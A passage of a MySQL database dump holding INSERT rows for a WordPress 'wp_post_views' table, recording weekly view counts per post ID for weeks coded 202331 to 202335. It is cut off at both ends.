8),(5292,1,'202331',8),(1584,1,'202331',9),(1766,1,'202331',9),(2609,1,'202331',9),(5050,1,'202331',9),(5248,1,'202331',9),(5320,1,'202331',9),(5323,1,'202331',9),(469,1,'202331',10),(484,1,'202331',10),(2457,1,'202331',10),(3489,1,'202331',10),(4412,1,'202331',10),(5076,1,'202331',10),(5304,1,'202331',10),(5314,1,'202331',10),(474,1,'202331',11),(486,1,'202331',11),(1604,1,'202331',11),(1608,1,'202331',11),(1728,1,'202331',11),(3060,1,'202331',11),(5062,1,'202331',11),(5353,1,'202331',11),(5359,1,'202331',11),(335,1,'202331',12),(468,1,'202331',12),(3764,1,'202331',12),(4520,1,'202331',12),(5131,1,'202331',12),(5307,1,'202331',12),(108,1,'202331',13),(487,1,'202331',13),(1598,1,'202331',13),(1612,1,'202331',13),(3781,1,'202331',13),(5356,1,'202331',13),(74,1,'202331',14),(84,1,'202331',14),(473,1,'202331',14),(1594,1,'202331',14),(2704,1,'202331',14),(87,1,'202331',15),(470,1,'202331',15),(1544,1,'202331',15),(4930,1,'202331',15),(5334,1,'202331',15),(1592,1,'202331',16),(472,1,'202331',17),(1582,1,'202331',17),(1588,1,'202331',17),(1602,1,'202331',17),(2503,1,'202331',17),(5163,1,'202331',17),(4457,1,'202331',19),(76,1,'202331',20),(91,1,'202331',20),(1596,1,'202331',20),(1600,1,'202331',21),(68,1,'202331',23),(1586,1,'202331',27),(89,1,'202331',28),(72,1,'202331',31),(2904,1,'202331',33),(80,1,'202331',110),(9,1,'202331',674),(110,1,'202332',1),(476,1,'202332',1),(482,1,'202332',1),(1590,1,'202332',1),(1697,1,'202332',1),(1707,1,'202332',1),(1713,1,'202332',1),(1715,1,'202332',1),(1730,1,'202332',1),(1734,1,'202332',1),(1737,1,'202332',1),(1776,1,'202332',1),(2063,1,'202332',1),(2150,1,'202332',1),(2152,1,'202332',1),(2154,1,'202332',1),(2252,1,'202332',1),(2993,1,'202332',1),(3096,1,'202332',1),(3097,1,'202332',1),(3269,1,'202332',1),(3273,1,'202332',1),(3275,1,'202332',1),(3278,1,'202332',1),(3282,1,'202332',1),(3316,1,'202332',1),(3724,1,'202332',1),(4357,1,'202332',1),(4387,1,'202332',1),(4546,1,'202332',1),(4668,1,'202332',1),(4744,1,'202332',1),(4858,1,'202332',1),(4862,1,'202332',1),(4897,1,'202332',1),(5020,1,'202332',1),(5153,1,'202332',1),(479,1,'202332',2),(481,1,'202332',2),(486,1,'202332',2),(488,1,'202332',2),(570,1,'202332',2),(1724,1,'202332',2),(1739,1,'202332',2);
INSERT INTO `wp_post_views` VALUES (1741,1,'202332',2),(1743,1,'202332',2),(1768,1,'202332',2),(1780,1,'202332',2),(1782,1,'202332',2),(2156,1,'202332',2),(2161,1,'202332',2),(2293,1,'202332',2),(2748,1,'202332',2),(2804,1,'202332',2),(3027,1,'202332',2),(3063,1,'202332',2),(3079,1,'202332',2),(3087,1,'202332',2),(3229,1,'202332',2),(3243,1,'202332',2),(3261,1,'202332',2),(3285,1,'202332',2),(3430,1,'202332',2),(3710,1,'202332',2),(3714,1,'202332',2),(4275,1,'202332',2),(4326,1,'202332',2),(4368,1,'202332',2),(4377,1,'202332',2),(4382,1,'202332',2),(4404,1,'202332',2),(4440,1,'202332',2),(4582,1,'202332',2),(4651,1,'202332',2),(4685,1,'202332',2),(4688,1,'202332',2),(4722,1,'202332',2),(4741,1,'202332',2),(4756,1,'202332',2),(4802,1,'202332',2),(4866,1,'202332',2),(4878,1,'202332',2),(4883,1,'202332',2),(5028,1,'202332',2),(5037,1,'202332',2),(5067,1,'202332',2),(5080,1,'202332',2),(5248,1,'202332',2),(467,1,'202332',3),(471,1,'202332',3),(477,1,'202332',3),(478,1,'202332',3),(480,1,'202332',3),(483,1,'202332',3),(1695,1,'202332',3),(1699,1,'202332',3),(1745,1,'202332',3),(2165,1,'202332',3),(2617,1,'202332',3),(2775,1,'202332',3),(2911,1,'202332',3),(2991,1,'202332',3),(3023,1,'202332',3),(3034,1,'202332',3),(3102,1,'202332',3),(3104,1,'202332',3),(3109,1,'202332',3),(3127,1,'202332',3),(3240,1,'202332',3),(3263,1,'202332',3),(3265,1,'202332',3),(3280,1,'202332',3),(3287,1,'202332',3),(3313,1,'202332',3),(3438,1,'202332',3),(3482,1,'202332',3),(3727,1,'202332',3),(3731,1,'202332',3),(3738,1,'202332',3),(3746,1,'202332',3),(3749,1,'202332',3),(3771,1,'202332',3),(3774,1,'202332',3),(3777,1,'202332',3),(4332,1,'202332',3),(4341,1,'202332',3),(4373,1,'202332',3),(4408,1,'202332',3),(4424,1,'202332',3),(4428,1,'202332',3),(4444,1,'202332',3),(4454,1,'202332',3),(4524,1,'202332',3),(4556,1,'202332',3),(4648,1,'202332',3),(4654,1,'202332',3),(4674,1,'202332',3),(4694,1,'202332',3),(4712,1,'202332',3),(4762,1,'202332',3),(4776,1,'202332',3),(4792,1,'202332',3),(4797,1,'202332',3),(4870,1,'202332',3),(5157,1,'202332',3),(5326,1,'202332',3),(5330,1,'202332',3),(102,1,'202332',4),(484,1,'202332',4),(485,1,'202332',4),(1772,1,'202332',4),(2148,1,'202332',4),(2965,1,'202332',4),(2989,1,'202332',4),(3006,1,'202332',4),(3038,1,'202332',4),(3060,1,'202332',4),(3107,1,'202332',4),(3117,1,'202332',4),(3226,1,'202332',4),(3253,1,'202332',4),(3297,1,'202332',4),(3479,1,'202332',4),(3486,1,'202332',4),(3489,1,'202332',4),(3498,1,'202332',4),(3752,1,'202332',4),(4329,1,'202332',4),(4391,1,'202332',4),(4396,1,'202332',4),(4432,1,'202332',4),(4517,1,'202332',4),(4542,1,'202332',4),(4657,1,'202332',4),(4660,1,'202332',4),(4697,1,'202332',4),(4700,1,'202332',4),(4771,1,'202332',4),(4874,1,'202332',4),(4888,1,'202332',4),(4893,1,'202332',4),(4976,1,'202332',4),(5046,1,'202332',4),(5054,1,'202332',4),(5146,1,'202332',4),(5301,1,'202332',4),(5363,1,'202332',4),(469,1,'202332',5),(470,1,'202332',5),(472,1,'202332',5),(1711,1,'202332',5),(2558,1,'202332',5),(2769,1,'202332',5),(2813,1,'202332',5),(2956,1,'202332',5),(2964,1,'202332',5),(3004,1,'202332',5),(3005,1,'202332',5),(3072,1,'202332',5),(3092,1,'202332',5),(3257,1,'202332',5),(3271,1,'202332',5),(3290,1,'202332',5),(3307,1,'202332',5),(3531,1,'202332',5),(3735,1,'202332',5),(3742,1,'202332',5),(4301,1,'202332',5),(4323,1,'202332',5),(4338,1,'202332',5),(4416,1,'202332',5),(4420,1,'202332',5),(4436,1,'202332',5),(4448,1,'202332',5),(4514,1,'202332',5),(4681,1,'202332',5),(4691,1,'202332',5),(4703,1,'202332',5),(4706,1,'202332',5),(4750,1,'202332',5),(5024,1,'202332',5),(5042,1,'202332',5),(5050,1,'202332',5),(5058,1,'202332',5),(5253,1,'202332',5),(5259,1,'202332',5),(5264,1,'202332',5),(1584,1,'202332',6),(1778,1,'202332',6),(2296,1,'202332',6),(2297,1,'202332',6),(2751,1,'202332',6),(3041,1,'202332',6),(3090,1,'202332',6),(3249,1,'202332',6),(3534,1,'202332',6),(3721,1,'202332',6),(4238,1,'202332',6),(4335,1,'202332',6),(4566,1,'202332',6),(4587,1,'202332',6),(4608,1,'202332',6),(4612,1,'202332',6),(4645,1,'202332',6),(4747,1,'202332',6),(4759,1,'202332',6),(4765,1,'202332',6),(4768,1,'202332',6),(5062,1,'202332',6),(5071,1,'202332',6),(5101,1,'202332',6),(5134,1,'202332',6),(5137,1,'202332',6),(5140,1,'202332',6),(5292,1,'202332',6),(5295,1,'202332',6),(5304,1,'202332',6),(5307,1,'202332',6),(5310,1,'202332',6),(5323,1,'202332',6),(1703,1,'202332',7),(1722,1,'202332',7),(1770,1,'202332',7),(2178,1,'202332',7),(3247,1,'202332',7),(3251,1,'202332',7),(4551,1,'202332',7),(4677,1,'202332',7),(4988,1,'202332',7),(4996,1,'202332',7),(5268,1,'202332',7),(5271,1,'202332',7),(5289,1,'202332',7),(5317,1,'202332',7),(74,1,'202332',8),(1606,1,'202332',8),(1614,1,'202332',8),(1718,1,'202332',8),(2159,1,'202332',8),(2457,1,'202332',8),(3066,1,'202332',8),(4363,1,'202332',8),(4753,1,'202332',8),(5125,1,'202332',8),(108,1,'202332',9),(1592,1,'202332',9),(1602,1,'202332',9),(2609,1,'202332',9),(3083,1,'202332',9),(4529,1,'202332',9),(4709,1,'202332',9),(5076,1,'202332',9),(5128,1,'202332',9),(5256,1,'202332',9),(1588,1,'202332',10),(1600,1,'202332',10),(1608,1,'202332',10),(1610,1,'202332',10),(2309,1,'202332',10),(2658,1,'202332',10),(3069,1,'202332',10),(5280,1,'202332',10),(5298,1,'202332',10),(5334,1,'202332',10),(5353,1,'202332',10),(5356,1,'202332',10),(487,1,'202332',11),(1598,1,'202332',11),(1604,1,'202332',11),(1766,1,'202332',11),(1774,1,'202332',11),(2704,1,'202332',11),(2801,1,'202332',11),(3124,1,'202332',11),(4977,1,'202332',11),(4980,1,'202332',11),(4983,1,'202332',11),(5122,1,'202332',11),(5359,1,'202332',11),(87,1,'202332',12),(335,1,'202332',12),(473,1,'202332',12),(1728,1,'202332',12),(3030,1,'202332',12),(3045,1,'202332',12),(3781,1,'202332',12),(4457,1,'202332',12),(4930,1,'202332',12),(5033,1,'202332',12),(5320,1,'202332',12),(84,1,'202332',13),(2503,1,'202332',13),(3764,1,'202332',13),(4663,1,'202332',13),(5276,1,'202332',13),(5314,1,'202332',13),(1582,1,'202332',14),(1596,1,'202332',14),(2809,1,'202332',14),(4412,1,'202332',14),(1544,1,'202332',15),(1594,1,'202332',15),(1612,1,'202332',15),(5163,1,'202332',15),(91,1,'202332',16),(76,1,'202332',17),(468,1,'202332',18),(474,1,'202332',19),(89,1,'202332',20),(5131,1,'202332',21),(4520,1,'202332',22),(68,1,'202332',25),(1586,1,'202332',25),(72,1,'202332',31),(2904,1,'202332',31),(80,1,'202332',121),(9,1,'202332',628),(106,1,'202333',1),(110,1,'202333',1),(3097,1,'202333',1),(4454,1,'202333',1),(4691,1,'202333',1),(5289,1,'202333',1),(1697,1,'202333',2),(2989,1,'202333',2),(3240,1,'202333',2),(3247,1,'202333',2),(3438,1,'202333',2),(3727,1,'202333',2),(3738,1,'202333',2),(4368,1,'202333',2),(4428,1,'202333',2),(4514,1,'202333',2),(4750,1,'202333',2),(478,1,'202333',3),(1699,1,'202333',3),(1701,1,'202333',3),(1703,1,'202333',3),(1707,1,'202333',3),(1709,1,'202333',3),(1713,1,'202333',3),(1722,1,'202333',3),(1747,1,'202333',3),(2161,1,'202333',3),(2252,1,'202333',3),(2293,1,'202333',3),(2748,1,'202333',3),(2801,1,'202333',3),(3041,1,'202333',3),(3072,1,'202333',3),(3096,1,'202333',3),(3109,1,'202333',3),(3271,1,'202333',3),(3287,1,'202333',3),(3316,1,'202333',3),(3742,1,'202333',3),(3746,1,'202333',3),(3774,1,'202333',3),(4329,1,'202333',3),(4332,1,'202333',3),(4382,1,'202333',3),(4396,1,'202333',3),(4408,1,'202333',3),(4424,1,'202333',3),(4440,1,'202333',3),(4556,1,'202333',3),(4582,1,'202333',3),(4668,1,'202333',3),(4681,1,'202333',3),(4688,1,'202333',3),(4697,1,'202333',3),(4722,1,'202333',3),(4747,1,'202333',3),(4762,1,'202333',3),(4797,1,'202333',3),(4802,1,'202333',3),(4866,1,'202333',3),(4874,1,'202333',3),(4883,1,'202333',3),(4888,1,'202333',3),(4983,1,'202333',3),(5050,1,'202333',3),(5137,1,'202333',3),(5295,1,'202333',3),(5330,1,'202333',3),(483,1,'202333',4),(1695,1,'202333',4),(1705,1,'202333',4),(1715,1,'202333',4),(1726,1,'202333',4),(1734,1,'202333',4),(1739,1,'202333',4),(1743,1,'202333',4),(1749,1,'202333',4),(1772,1,'202333',4),(1776,1,'202333',4),(2063,1,'202333',4),(2165,1,'202333',4),(2297,1,'202333',4),(2965,1,'202333',4),(2993,1,'202333',4),(3087,1,'202333',4),(3092,1,'202333',4),(3243,1,'202333',4),(3249,1,'202333',4),(3253,1,'202333',4),(3257,1,'202333',4),(3261,1,'202333',4),(3265,1,'202333',4),(3282,1,'202333',4),(3541,1,'202333',4),(3714,1,'202333',4),(3724,1,'202333',4),(3752,1,'202333',4),(3771,1,'202333',4),(3777,1,'202333',4),(4377,1,'202333',4),(4387,1,'202333',4),(4420,1,'202333',4),(4517,1,'202333',4),(4529,1,'202333',4),(4551,1,'202333',4),(4566,1,'202333',4),(4591,1,'202333',4),(4648,1,'202333',4),(4657,1,'202333',4),(4685,1,'202333',4),(4694,1,'202333',4),(4712,1,'202333',4),(4792,1,'202333',4),(4858,1,'202333',4),(4862,1,'202333',4),(4878,1,'202333',4),(4893,1,'202333',4),(4897,1,'202333',4),(4988,1,'202333',4),(5020,1,'202333',4),(5046,1,'202333',4),(5062,1,'202333',4),(5101,1,'202333',4),(5125,1,'202333',4),(5128,1,'202333',4),(5146,1,'202333',4),(5264,1,'202333',4),(5363,1,'202333',4),(102,1,'202333',5),(476,1,'202333',5),(482,1,'202333',5),(1711,1,'202333',5),(1718,1,'202333',5),(1730,1,'202333',5),(1751,1,'202333',5),(1780,1,'202333',5),(1782,1,'202333',5),(2150,1,'202333',5),(2156,1,'202333',5),(2248,1,'202333',5),(2558,1,'202333',5),(2617,1,'202333',5),(2751,1,'202333',5),(2956,1,'202333',5),(2964,1,'202333',5),(3107,1,'202333',5),(3124,1,'202333',5),(3226,1,'202333',5),(3263,1,'202333',5),(3269,1,'202333',5),(3280,1,'202333',5),(3297,1,'202333',5),(3307,1,'202333',5),(3430,1,'202333',5),(3479,1,'202333',5),(3486,1,'202333',5),(3531,1,'202333',5),(3534,1,'202333',5),(3710,1,'202333',5),(3731,1,'202333',5),(3749,1,'202333',5),(4338,1,'202333',5),(4341,1,'202333',5),(4363,1,'202333',5),(4373,1,'202333',5),(4416,1,'202333',5),(4432,1,'202333',5),(4444,1,'202333',5),(4651,1,'202333',5),(4660,1,'202333',5),(4674,1,'202333',5),(4741,1,'202333',5),(4753,1,'202333',5),(4870,1,'202333',5),(5028,1,'202333',5),(5134,1,'202333',5),(5153,1,'202333',5),(5157,1,'202333',5),(5256,1,'202333',5),(5259,1,'202333',5),(5280,1,'202333',5),(5292,1,'202333',5),(5304,1,'202333',5),(5310,1,'202333',5),(477,1,'202333',6),(479,1,'202333',6),(480,1,'202333',6),(485,1,'202333',6),(488,1,'202333',6),(1584,1,'202333',6),(1590,1,'202333',6),(1720,1,'202333',6),(1732,1,'202333',6),(1741,1,'202333',6),(1745,1,'202333',6),(1768,1,'202333',6),(1778,1,'202333',6),(2148,1,'202333',6),(2809,1,'202333',6),(2813,1,'202333',6),(3005,1,'202333',6),(3006,1,'202333',6),(3027,1,'202333',6),(3038,1,'202333',6),(3045,1,'202333',6),(3063,1,'202333',6),(3102,1,'202333',6),(3104,1,'202333',6),(3127,1,'202333',6),(3229,1,'202333',6),(3245,1,'202333',6),(3251,1,'202333',6),(3267,1,'202333',6),(3273,1,'202333',6),(3275,1,'202333',6),(3278,1,'202333',6),(3482,1,'202333',6),(3498,1,'202333',6),(3721,1,'202333',6),(3735,1,'202333',6),(4275,1,'202333',6),(4400,1,'202333',6),(4436,1,'202333',6),(4546,1,'202333',6),(4663,1,'202333',6),(4677,1,'202333',6),(4703,1,'202333',6),(4744,1,'202333',6),(4759,1,'202333',6),(4768,1,'202333',6),(5058,1,'202333',6),(5071,1,'202333',6),(5080,1,'202333',6),(5276,1,'202333',6),(5320,1,'202333',6),(5326,1,'202333',6),(472,1,'202333',7),(481,1,'202333',7),(570,1,'202333',7),(1606,1,'202333',7),(2154,1,'202333',7),(2775,1,'202333',7),(2911,1,'202333',7),(2991,1,'202333',7),(3034,1,'202333',7),(3259,1,'202333',7),(4323,1,'202333',7),(4326,1,'202333',7),(4335,1,'202333',7),(4357,1,'202333',7),(4391,1,'202333',7),(4404,1,'202333',7),(4524,1,'202333',7),(4654,1,'202333',7),(4706,1,'202333',7),(4756,1,'202333',7),(4976,1,'202333',7),(4977,1,'202333',7),(5037,1,'202333',7),(5042,1,'202333',7),(5054,1,'202333',7),(5067,1,'202333',7),(5248,1,'202333',7),(5253,1,'202333',7),(5268,1,'202333',7),(5301,1,'202333',7),(5314,1,'202333',7),(5323,1,'202333',7),(5356,1,'202333',7),(468,1,'202333',8),(473,1,'202333',8),(486,1,'202333',8),(1614,1,'202333',8),(1737,1,'202333',8),(1766,1,'202333',8),(2178,1,'202333',8),(2658,1,'202333',8),(3285,1,'202333',8),(4542,1,'202333',8),(4587,1,'202333',8),(4608,1,'202333',8),(4700,1,'202333',8),(5076,1,'202333',8),(5140,1,'202333',8),(5298,1,'202333',8),(469,1,'202333',9),(471,1,'202333',9),(484,1,'202333',9),(2159,1,'202333',9),(2457,1,'202333',9),(3004,1,'202333',9),(3079,1,'202333',9),(3290,1,'202333',9),(3489,1,'202333',9),(4301,1,'202333',9),(4448,1,'202333',9),(4765,1,'202333',9),(4996,1,'202333',9),(5024,1,'202333',9),(5033,1,'202333',9),(474,1,'202333',10),(487,1,'202333',10),(1608,1,'202333',10),(1774,1,'202333',10),(2804,1,'202333',10),(3023,1,'202333',10),(3060,1,'202333',10),(3069,1,'202333',10),(4709,1,'202333',10),(4771,1,'202333',10),(5307,1,'202333',10),(5334,1,'202333',10),(84,1,'202333',11),(108,1,'202333',11),(470,1,'202333',11),(1770,1,'202333',11),(4238,1,'202333',11),(4612,1,'202333',11),(4980,1,'202333',11),(5122,1,'202333',11),(5359,1,'202333',11),(87,1,'202333',12),(335,1,'202333',12),(467,1,'202333',12),(2503,1,'202333',12),(3066,1,'202333',12),(3083,1,'202333',12),(3090,1,'202333',12),(3313,1,'202333',12),(4776,1,'202333',12),(1592,1,'202333',13),(1724,1,'202333',13),(2152,1,'202333',13),(2609,1,'202333',13),(3117,1,'202333',13),(5271,1,'202333',13),(1602,1,'202333',14),(2296,1,'202333',14),(2769,1,'202333',14),(4412,1,'202333',14),(4520,1,'202333',14),(4930,1,'202333',14),(5317,1,'202333',14),(5353,1,'202333',14),(74,1,'202333',15),(1588,1,'202333',16),(1598,1,'202333',16),(3030,1,'202333',16),(3764,1,'202333',16),(4457,1,'202333',16),(4645,1,'202333',16),(1612,1,'202333',17),(2309,1,'202333',17),(2704,1,'202333',17),(1582,1,'202333',18),(1544,1,'202333',19),(1728,1,'202333',19),(91,1,'202333',20),(1610,1,'202333',20),(3781,1,'202333',20),(89,1,'202333',21),(1596,1,'202333',23),(1604,1,'202333',23),(1600,1,'202333',24),(76,1,'202333',25),(5163,1,'202333',25),(1586,1,'202333',26),(5131,1,'202333',27),(1594,1,'202333',28),(72,1,'202333',32),(2904,1,'202333',44),(68,1,'202333',49),(80,1,'202333',116),(9,1,'202333',684),(106,1,'202334',1),(1726,1,'202334',1),(1732,1,'202334',1),(1734,1,'202334',1),(1737,1,'202334',1),(1747,1,'202334',1),(1751,1,'202334',1),(1782,1,'202334',1),(2252,1,'202334',1),(2993,1,'202334',1),(3063,1,'202334',1),(3127,1,'202334',1),(3249,1,'202334',1),(3259,1,'202334',1),(3261,1,'202334',1),(3269,1,'202334',1),(3280,1,'202334',1),(3724,1,'202334',1),(4668,1,'202334',1),(4802,1,'202334',1),(5042,1,'202334',1),(5067,1,'202334',1),(478,1,'202334',2),(483,1,'202334',2),(1705,1,'202334',2),(1720,1,'202334',2),(1730,1,'202334',2),(1741,1,'202334',2),(1749,1,'202334',2),(1780,1,'202334',2),(2063,1,'202334',2),(2156,1,'202334',2),(2248,1,'202334',2),(2748,1,'202334',2),(3104,1,'202334',2),(3117,1,'202334',2),(3243,1,'202334',2),(3245,1,'202334',2),(3253,1,'202334',2),(3265,1,'202334',2),(3267,1,'202334',2),(3273,1,'202334',2),(3285,1,'202334',2),(3290,1,'202334',2),(3438,1,'202334',2),(3541,1,'202334',2),(3738,1,'202334',2),(4275,1,'202334',2),(4357,1,'202334',2),(4377,1,'202334',2),(4387,1,'202334',2),(4391,1,'202334',2),(4428,1,'202334',2),(4432,1,'202334',2),(4436,1,'202334',2),(4514,1,'202334',2),(4591,1,'202334',2),(4688,1,'202334',2),(4694,1,'202334',2),(4706,1,'202334',2),(4747,1,'202334',2),(4797,1,'202334',2),(4870,1,'202334',2),(4878,1,'202334',2),(5271,1,'202334',2),(5292,1,'202334',2),(5298,1,'202334',2),(5304,1,'202334',2),(5363,1,'202334',2),(102,1,'202334',3),(110,1,'202334',3),(481,1,'202334',3),(1695,1,'202334',3),(1707,1,'202334',3),(1711,1,'202334',3),(1715,1,'202334',3),(1722,1,'202334',3),(1745,1,'202334',3),(1778,1,'202334',3),(2148,1,'202334',3),(2293,1,'202334',3),(2775,1,'202334',3),(2813,1,'202334',3),(2965,1,'202334',3),(3027,1,'202334',3),(3034,1,'202334',3),(3041,1,'202334',3),(3092,1,'202334',3),(3107,1,'202334',3),(3257,1,'202334',3),(3271,1,'202334',3),(3278,1,'202334',3),(3316,1,'202334',3),(3430,1,'202334',3),(3482,1,'202334',3),(3486,1,'202334',3),(3498,1,'202334',3),(3727,1,'202334',3),(3752,1,'202334',3),(4326,1,'202334',3),(4373,1,'202334',3),(4382,1,'202334',3),(4396,1,'202334',3),(4400,1,'202334',3),(4416,1,'202334',3),(4424,1,'202334',3),(4440,1,'202334',3),(4448,1,'202334',3),(4517,1,'202334',3),(4524,1,'202334',3),(4546,1,'202334',3),(4612,1,'202334',3),(4712,1,'202334',3),(4722,1,'202334',3),(4750,1,'202334',3),(4768,1,'202334',3),(4792,1,'202334',3),(4858,1,'202334',3),(4874,1,'202334',3),(4897,1,'202334',3),(4977,1,'202334',3),(5046,1,'202334',3),(5101,1,'202334',3),(5137,1,'202334',3),(5153,1,'202334',3),(5157,1,'202334',3),(5248,1,'202334',3),(5268,1,'202334',3),(471,1,'202334',4),(476,1,'202334',4),(480,1,'202334',4),(486,1,'202334',4),(488,1,'202334',4),(570,1,'202334',4),(1590,1,'202334',4),(1614,1,'202334',4),(1703,1,'202334',4),(1709,1,'202334',4),(1713,1,'202334',4),(1768,1,'202334',4),(2150,1,'202334',4),(2161,1,'202334',4),(2165,1,'202334',4),(2178,1,'202334',4),(2297,1,'202334',4),(2617,1,'202334',4),(2804,1,'202334',4),(3005,1,'202334',4),(3023,1,'202334',4),(3090,1,'202334',4),(3097,1,'202334',4),(3226,1,'202334',4),(3229,1,'202334',4),(3240,1,'202334',4),(3251,1,'202334',4),(3282,1,'202334',4),(3287,1,'202334',4),(3297,1,'202334',4),(3313,1,'202334',4),(3534,1,'202334',4),(3731,1,'202334',4),(3771,1,'202334',4),(4238,1,'202334',4),(4329,1,'202334',4),(4404,1,'202334',4),(4408,1,'202334',4),(4566,1,'202334',4),(4648,1,'202334',4),(4691,1,'202334',4),(4697,1,'202334',4),(4753,1,'202334',4),(4759,1,'202334',4),(4888,1,'202334',4),(4893,1,'202334',4),(5020,1,'202334',4),(5028,1,'202334',4),(5037,1,'202334',4),(5050,1,'202334',4),(5054,1,'202334',4),(5080,1,'202334',4),(5134,1,'202334',4),(5259,1,'202334',4),(5264,1,'202334',4),(5295,1,'202334',4),(5301,1,'202334',4),(5310,1,'202334',4),(474,1,'202334',5),(477,1,'202334',5),(485,1,'202334',5),(1699,1,'202334',5),(1718,1,'202334',5),(1724,1,'202334',5),(1772,1,'202334',5),(2558,1,'202334',5),(2801,1,'202334',5),(2991,1,'202334',5),(3004,1,'202334',5),(3066,1,'202334',5),(3079,1,'202334',5),(3087,1,'202334',5),(3096,1,'202334',5),(3102,1,'202334',5),(3109,1,'202334',5),(3275,1,'202334',5),(3307,1,'202334',5),(3479,1,'202334',5),(3489,1,'202334',5),(3531,1,'202334',5),(3714,1,'202334',5),(3742,1,'202334',5),(3774,1,'202334',5),(4332,1,'202334',5),(4335,1,'202334',5),(4341,1,'202334',5),(4368,1,'202334',5),(4542,1,'202334',5),(4556,1,'202334',5),(4663,1,'202334',5),(4685,1,'202334',5),(4700,1,'202334',5),(4741,1,'202334',5),(4776,1,'202334',5),(4862,1,'202334',5),(4976,1,'202334',5),(4996,1,'202334',5),(5314,1,'202334',5),(87,1,'202334',6),(470,1,'202334',6),(472,1,'202334',6),(1701,1,'202334',6),(1770,1,'202334',6),(1776,1,'202334',6),(2964,1,'202334',6),(2989,1,'202334',6),(3006,1,'202334',6),(3038,1,'202334',6),(3247,1,'202334',6),(3710,1,'202334',6),(3746,1,'202334',6),(4444,1,'202334',6),(4651,1,'202334',6),(4756,1,'202334',6),(4765,1,'202334',6),(4866,1,'202334',6),(4988,1,'202334',6),(5125,1,'202334',6),(5128,1,'202334',6),(5330,1,'202334',6),(335,1,'202334',7),(479,1,'202334',7),(2309,1,'202334',7),(2751,1,'202334',7),(2911,1,'202334',7),(2956,1,'202334',7),(3045,1,'202334',7),(3072,1,'202334',7),(3777,1,'202334',7),(4338,1,'202334',7),(4454,1,'202334',7),(4551,1,'202334',7),(4587,1,'202334',7),(4660,1,'202334',7),(4703,1,'202334',7),(4744,1,'202334',7),(4883,1,'202334',7),(4980,1,'202334',7),(4983,1,'202334',7),(5058,1,'202334',7),(5146,1,'202334',7),(5253,1,'202334',7),(5256,1,'202334',7),(5289,1,'202334',7),(5326,1,'202334',7),(5353,1,'202334',7),(1584,1,'202334',8),(1697,1,'202334',8),(2152,1,'202334',8),(2159,1,'202334',8),(4363,1,'202334',8),(4529,1,'202334',8),(4582,1,'202334',8),(4674,1,'202334',8),(4771,1,'202334',8),(5024,1,'202334',8),(5033,1,'202334',8),(5062,1,'202334',8),(5071,1,'202334',8),(5140,1,'202334',8),(5323,1,'202334',8),(1588,1,'202334',9),(1594,1,'202334',9),(1604,1,'202334',9),(1606,1,'202334',9),(2154,1,'202334',9),(2296,1,'202334',9),(2457,1,'202334',9),(2809,1,'202334',9),(3030,1,'202334',9),(3764,1,'202334',9),(4301,1,'202334',9),(4420,1,'202334',9),(4657,1,'202334',9),(4677,1,'202334',9),(4709,1,'202334',9),(5122,1,'202334',9),(5276,1,'202334',9),(5307,1,'202334',9),(5334,1,'202334',9),(74,1,'202334',10),(468,1,'202334',10),(487,1,'202334',10),(1608,1,'202334',10),(1766,1,'202334',10),(1774,1,'202334',10),(3124,1,'202334',10),(3721,1,'202334',10),(4608,1,'202334',10),(4681,1,'202334',10),(4930,1,'202334',10),(5076,1,'202334',10),(5317,1,'202334',10),(3069,1,'202334',11),(3083,1,'202334',11),(4645,1,'202334',11),(4654,1,'202334',11),(5359,1,'202334',11),(469,1,'202334',12),(2658,1,'202334',12),(2769,1,'202334',12),(3060,1,'202334',12),(4412,1,'202334',12),(5280,1,'202334',12),(5356,1,'202334',12),(484,1,'202334',13),(1544,1,'202334',13),(1582,1,'202334',13),(1598,1,'202334',13),(1602,1,'202334',13),(2503,1,'202334',13),(4762,1,'202334',13),(5320,1,'202334',13),(84,1,'202334',14),(467,1,'202334',14),(473,1,'202334',14),(1592,1,'202334',14),(2609,1,'202334',14),(2704,1,'202334',14),(3735,1,'202334',15),(108,1,'202334',16),(1586,1,'202334',16),(3781,1,'202334',16),(5131,1,'202334',16),(1600,1,'202334',17),(1610,1,'202334',17),(1728,1,'202334',17),(4457,1,'202334',17),(91,1,'202334',20),(4520,1,'202334',21),(1612,1,'202334',22),(76,1,'202334',23),(89,1,'202334',23),(1596,1,'202334',23),(5163,1,'202334',24),(72,1,'202334',28),(2904,1,'202334',29),(68,1,'202334',52),(80,1,'202334',138),(9,1,'202334',675),(106,1,'202335',1),(1705,1,'202335',1),(1713,1,'202335',1),(1732,1,'202335',1),(2150,1,'202335',1),(3109,1,'202335',1),(3267,1,'202335',1),(3278,1,'202335',1),(4546,1,'202335',1),(4587,1,'202335',1),(4654,1,'202335',1),(4668,1,'202335',1),(4747,1,'202335',1),(4792,1,'202335',1),(4870,1,'202335',1),(4878,1,'202335',1),(4883,1,'202335',1),(4893,1,'202335',1),(4897,1,'202335',1),(110,1,'202335',2),(471,1,'202335',2),(1584,1,'202335',2),(1726,1,'202335',2),(1739,1,'202335',2),(1743,1,'202335',2),(1747,1,'202335',2),(1749,1,'202335',2),(1772,1,'202335',2),(1776,1,'202335',2),(1778,1,'202335',2),(1782,1,'202335',2),(2252,1,'202335',2),(2804,1,'202335',2),(3063,1,'202335',2),(3097,1,'202335',2),(3104,1,'202335',2),(3117,1,'202335',2),(3259,1,'202335',2),(3261,1,'202335',2),(3263,1,'202335',2),(3269,1,'202335',2),(3313,1,'202335',2),(3482,1,'202335',2),(3486,1,'202335',2),(3774,1,'202335',2),(3777,1,'202335',2),(4556,1,'202335',2),(4591,1,'202335',2),(4651,1,'202335',2),(4712,1,'202335',2),(4753,1,'202335',2),(4756,1,'202335',2),(4762,1,'202335',2),(4765,1,'202335',2),(4797,1,'202335',2),(4802,1,'202335',2),(4858,1,'202335',2),(4862,1,'202335',2),(4866,1,'202335',2),(4874,1,'202335',2),(4983,1,'202335',2),(5020,1,'202335',2),(5028,1,'202335',2),(5058,1,'202335',2),(5128,1,'202335',2),(5330,1,'202335',2),(476,1,'202335',3),(480,1,'202335',3),(483,1,'202335',3),(1697,1,'202335',3),(1699,1,'202335',3),(1709,1,'202335',3),(1715,1,'202335',3),(1720,1,'202335',3),(1737,1,'202335',3),(1780,1,'202335',3),(2156,1,'202335',3),(2248,1,'202335',3),(2558,1,'202335',3),(2617,1,'202335',3),(2748,1,'202335',3),(2991,1,'202335',3),(3045,1,'202335',3),(3096,1,'202335',3),(3107,1,'202335',3),(3226,1,'202335',3),(3229,1,'202335',3),(3245,1,'202335',3),(3265,1,'202335',3),(3275,1,'202335',3),(3280,1,'202335',3),(3290,1,'202335',3),(3297,1,'202335',3),(3430,1,'202335',3),(3479,1,